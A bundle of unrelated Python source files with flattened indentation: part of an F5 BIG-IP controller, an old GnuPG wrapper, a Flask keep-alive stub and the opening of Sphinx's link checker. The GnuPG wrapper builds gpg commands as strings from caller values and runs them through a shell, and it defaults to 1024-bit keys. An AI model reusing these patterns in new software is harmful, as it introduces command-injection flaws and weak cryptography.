pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVE_SELF |
pyinotify.IN_DELETE_SELF)
_wm.add_watch(
path=self._config_dir,
mask=mask,
quiet=False,
exclude_filter=lambda path: False)
log.info('entering inotify loop to watch {}'.format(
self._config_file))
_notifier.loop(callback=self._loop_check)
if (not self._polling and _notifier._fd is None):
log.info('terminating')
self._running = False
except Exception as e:
log.warning(e)
if self._user_abort:
log.info('Received user kill signal, terminating.')
def _digest(self):
sha = hashlib.sha256()
with open(self._config_file, 'rb') as f:
fcntl.lockf(f.fileno(), fcntl.LOCK_SH, 0, 0, 0)
while True:
buf = f.read(4096)
if not buf:
break
sha.update(buf)
fcntl.lockf(f.fileno(), fcntl.LOCK_UN, 0, 0, 0)
return sha.digest()
def _should_watch(self, pathname):
if pathname == self._config_file:
return True
return False
def _is_changed(self):
changed = False
cur_hash = None
if not os.path.exists(self._config_file):
if cur_hash != self._config_stats:
changed = True
else:
changed = False
else:
try:
cur_hash = self._digest()
if cur_hash != self._config_stats:
changed = True
else:
changed = False
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
return (changed, cur_hash)
def process_default(self, event):
if (pyinotify.IN_DELETE_SELF == event.mask or
pyinotify.IN_MOVE_SELF == event.mask):
log.warn(
'watchpoint {} has been moved or destroyed, using poll loop'.
format(self._config_dir))
self._polling = True
if self._config_stats is not None:
log.debug('config file {} changed, parent gone'.format(
self._config_file))
self._config_stats = None
self._on_change()
if self._should_watch(event.pathname):
(changed, sha) = self._is_changed()
if changed:
log.debug('config file {0} changed - signalling bigip'.format(
self._config_file, self._config_stats, sha))
self._config_stats = sha
self._on_change()
def _parse_config(config_file):
def _file_exist_cb(log_success):
if os.path.exists(config_file):
if log_success:
log.info('Config file: {} found'.format(config_file))
return (True, None)
else:
return (False, 'Waiting for config file {}'.format(config_file))
_retry_backoff(_file_exist_cb)
with open(config_file, 'r') as config:
fcntl.lockf(config.fileno(), fcntl.LOCK_SH, 0, 0, 0)
data = config.read()
fcntl.lockf(config.fileno(), fcntl.LOCK_UN, 0, 0, 0)
config_json = json.loads(data)
log.debug('loaded configuration file successfully')
return config_json
def _handle_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--config-file',
type=str,
required=True,
help='BigIp configuration file')
parser.add_argument(
'--ctlr-prefix',
type=str,
required=True,
help='Controller name prefix'
)
args = parser.parse_args()
basename = os.path.basename(args.config_file)
if not basename or 0 == len(basename):
raise ConfigError('must provide a file path')
args.config_file = os.path.realpath(args.config_file)
return args
def _handle_global_config(config):
level = DEFAULT_LOG_LEVEL
verify_interval = DEFAULT_VERIFY_INTERVAL
if config and 'global' in config:
global_cfg = config['global']
if 'log-level' in global_cfg:
log_level = global_cfg['log-level']
try:
level = logging.getLevelName(log_level.upper())
except (AttributeError):
log.warn('The "global:log-level" field in the configuration '
'file should be a string')
if 'verify-interval' in global_cfg:
try:
verify_interval = float(global_cfg['verify-interval'])
if verify_interval < 0:
verify_interval = DEFAULT_VERIFY_INTERVAL
log.warn('The "global:verify-interval" field in the '
'configuration file should be a non-negative '
'number')
except (ValueError):
log.warn('The "global:verify-interval" field in the '
'configuration file should be a number')
vxlan_partition = global_cfg.get('vxlan-partition')
try:
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
except:
level = DEFAULT_LOG_LEVEL
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
log.warn('Undefined value specified for the '
'"global:log-level" field in the configuration file')
# level only is needed for unit tests
return verify_interval, level, vxlan_partition
def _handle_bigip_config(config):
if (not config) or ('bigip' not in config):
raise ConfigError('Configuration file missing "bigip" section')
bigip = config['bigip']
if 'username' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:username" section')
if 'password' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:password" section')
if 'url' not in bigip:
raise ConfigError('Configuration file missing "bigip:url" section')
if ('partitions' not in bigip) or (len(bigip['partitions']) == 0):
raise ConfigError('Configuration file must specify at least one '
'partition in the "bigip:partitions" section')
url = urlparse(bigip['url'])
host = url.hostname
port = url.port
if not port:
port = 443
return host, port
def _handle_vxlan_config(config):
if config and 'vxlan-fdb' in config:
fdb = config['vxlan-fdb']
if 'name' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:name" section')
if 'records' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:records" section')
if config and 'vxlan-arp' in config:
arp = config['vxlan-arp']
if 'arps' not in arp:
raise ConfigError('Configuration file missing '
'"vxlan-arp:arps" section')
def _set_user_agent(prefix):
try:
with open('/app/vendor/src/f5/VERSION_BUILD.json', 'r') \
as version_file:
data = json.load(version_file)
user_agent = \
prefix + "-bigip-ctlr-" + data['version'] + '-' + data['build']
except Exception as e:
user_agent = prefix + "-bigip-ctlr-VERSION-UNKNOWN"
log.error("Could not read version file: %s", e)
return user_agent
def _retry_backoff(cb):
RETRY_INTERVAL = 1
log_interval = 0.5
elapsed = 0.5
log_success = False
while 1:
if log_interval > 0.5:
log_success = True
(success, val) = cb(log_success)
if success:
return val
if elapsed == log_interval:
elapsed = 0
log_interval *= 2
log.error("Encountered error: {}. Retrying for {} seconds.".format(
val, int(log_interval)
))
time.sleep(RETRY_INTERVAL)
elapsed += RETRY_INTERVAL
def _find_net_schema():
paths = [path for path in sys.path if 'site-packages' in path]
for path in paths:
for root, dirs, files in os.walk(path):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
for root, dirs, files in os.walk('/app/src/f5-cccl'):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
log.info('Could not find CCCL schema: {}'.format(NET_SCHEMA_NAME))
return ''
def main():
try:
args = _handle_args()
config = _parse_config(args.config_file)
verify_interval, _, vxlan_partition = _handle_global_config(config)
host, port = _handle_bigip_config(config)
# FIXME (kenr): Big-IP settings are currently static (we ignore any
# changes to these fields in subsequent updates). We
# may want to make the changes dynamic in the future.
# BIG-IP to manage
def _bigip_connect_cb(log_success):
try:
bigip = mgmt_root(
host,
config['bigip']['username'],
config['bigip']['password'],
port,
"tmos")
if log_success:
log.info('BIG-IP connection established.')
return (True, bigip)
except Exception, e:
return (False, 'BIG-IP connection error: {}'.format(e))
bigip = _retry_backoff(_bigip_connect_cb)
# Read version and build info, set user-agent for ICR session
user_agent = _set_user_agent(args.ctlr_prefix)
managers = []
for partition in config['bigip']['partitions']:
# Management for the BIG-IP partitions
manager = CloudServiceManager(
bigip,
partition,
user_agent=user_agent)
managers.append(manager)
if vxlan_partition:
# Management for net resources (VXLAN)
manager = CloudServiceManager(
bigip,
vxlan_partition,
user_agent=user_agent,
prefix=args.ctlr_prefix,
schema_path=_find_net_schema())
managers.append(manager)
handler = ConfigHandler(args.config_file,
managers,
verify_interval)
if os.path.exists(args.config_file):
handler.notify_reset()
watcher = ConfigWatcher(args.config_file, handler.notify_reset)
watcher.loop()
handler.stop()
except (IOError, ValueError, ConfigError) as e:
log.error(e)
sys.exit(1)
except Exception:
log.exception('Unexpected error')
sys.exit(1)
return 0
if __name__ == "__main__":
main()
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2010 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
import locale
__author__ = "Vinay Sajip"
__date__ = "$01-Mar-2010 12:29:29$"
try:
from io import StringIO
from io import TextIOWrapper
from io import BufferedReader
from io import BufferedWriter
except ImportError:
from cStringIO import StringIO
class BufferedReader: pass
class BufferedWriter: pass
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import threading
import tempfile
import shutil
try:
import logging.NullHandler as NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
outstream.close()
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase):
stream.write(passphrase)
logger.debug("Wrote passphrase")
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _wrap_input(inp):
if isinstance(inp, BufferedWriter):
oldinp = inp
inp = TextIOWrapper(inp)
logger.debug('wrapped input: %r -> %r', oldinp, inp)
return inp
def _wrap_output(outp):
if isinstance(outp, BufferedReader):
oldoutp = outp
outp = TextIOWrapper(outp)
logger.debug('wrapped output: %r -> %r', oldoutp, outp)
return outp
#The following is needed for Python2.7 :-(
def _make_file(s):
try:
rv = StringIO(s)
except TypeError:
from io import BytesIO
rv = BytesIO(s)
return rv
class GPG(object):
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.verbose = verbose
self.encoding = locale.getpreferredencoding()
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = Verify() # any result will do for this
self._collect_output(p, result)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
lines.append(line)
if self.verbose:
print(line)
logger.debug("%s", line.rstrip())
if line == "": break
line = line.rstrip()
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if data == "":
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning.
"""
stderr = _wrap_output(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = _wrap_output(process.stdout)
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
def _handle_io(self, args, file, result, passphrase=None):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not isinstance(file, BufferedReader):
stdin = _wrap_input(p.stdin)
else:
stdin = p.stdin
if passphrase:
passphrase += '\n'
if stdin is p.stdin:
passphrase = passphrase.encode(self.encoding)
_write_passphrase(stdin, passphrase)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
return self.sign_file(_make_file(message), **kwargs)
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True):
"""sign file"""
args = ["-sa"]
if clearsign:
args.append("--clearsign")
if keyid:
args.append("--default-key %s" % keyid)
result = Sign()
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
#self._handle_io(args, _make_file(message), result, passphrase=passphrase)
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = _wrap_input(p.stdin)
if passphrase:
passphrase += '\n'
_write_passphrase(stdin, passphrase)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer)
return result
def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(str(sig))
>>> assert verify
"""
return self.verify_file(_make_file(data))
def verify_file(self, file):
"Verify the signature on the contents of the file-like object 'file'"
result = Verify()
self._handle_io(['--verify'], file, result)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
result = ImportResult()
self._handle_io(['--import'], _make_file(key_data), result)
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ["--batch --delete-%s %s" % (which, fingerprints)]
result = DeleteResult()
p = self._open_subprocess(args)
self._collect_output(p, result)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(keyids)
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = DeleteResult() # any result will do
self._collect_output(p, result)
return result.data
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = ListKeys()
self._collect_output(p, result)
stdout = _make_file(result.data)
valid_keywords = 'pub uid sec fpr'.split()
while True:
line = stdout.readline()
if self.verbose:
print(line)
logger.debug("%s", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = GenKey()
file = _make_file(input)
self._handle_io(args, file, result)
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
rname = None
rname_fd = None
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
rname = output
rname_fd, output = tempfile.mkstemp()
os.remove(output)
args.append('--output %s' % output)
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient %s' % recipient)
if sign:
args.append("--sign --default-key %s" % sign)
if always_trust:
args.append("--always-trust")
result = Crypt()
self._handle_io(args, file, result, passphrase=passphrase)
if result.ok == True and rname != None:
shutil.copyfile(output, rname)
os.close(rname_fd)
os.remove(output) # to avoid overwrite confirmation message
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status
'need passphrase'
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status
'decryption failed'
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status
'decryption ok'
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status
'need passphrase'
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status
'encryption ok'
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status
'decryption ok'
>>> assert result.fingerprint == print1
"""
return self.encrypt_file(_make_file(data), recipients, **kwargs)
def decrypt(self, message, **kwargs):
return self.decrypt_file(_make_file(message), **kwargs)
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output %s' % output)
if always_trust:
args.append("--always-trust")
result = Crypt()
self._handle_io(args, file, result, passphrase)
return result
class Verify(object):
"Handle status messages for --verify"
def __init__(self):
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE"):
pass
elif key in ("PLAINTEXT", "PLAINTEXT_LENGTH", "DECRYPTION_INFO"):
pass
elif key == "BADSIG":
self.valid = False
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self):
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self):
self.curkey = None
self.fingerprints = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = [self.curkey['uid']]
del self.curkey['uid']
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self):
Verify.__init__(self)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY"):
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"DECRYPTION_FAILED"):
self.status = key.replace("_", " ").lower()
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self):
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self):
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambigious specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self):
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data or ''
def handle_status(self, key, value):
if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
|
main.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
|
linkcheck.py
|
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import json
import queue
import re
import socket
import threading
from html.parser import HTMLParser
from os import path
from typing import Any, Dict, List, Set, Tuple
from urllib.parse import unquote, urlparse
from docutils import nodes
from docutils.nodes import Node
from requests.exceptions import HTTPError
from sphinx.application import Sphinx
from sphinx.builders import Builder
from sphinx.locale import __
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, turquoise
)
from sphinx.util.nodes import get_node_line
from sphinx.util.requests import is_ssl_error
logger = logging.getLogger(__name__)
uri_re = re.compile('([a-z]+:)?//') # matches to foo:// and // (a protocol relative URL)
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml;q=0.9,*/*;q=0.8',
}
class AnchorCheckParser(HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor: str) -> None:
super().__init__()
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag: Any, attrs: Any) -> None:
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response: requests.requests.Response, anchor: str) -> bool:
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
if isinstance(chunk, bytes): # requests failed to decode
chunk = chunk.decode() # manually try to decode it
parser.feed(chunk)
if parser.found:
break
parser.close()
return parser.found
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
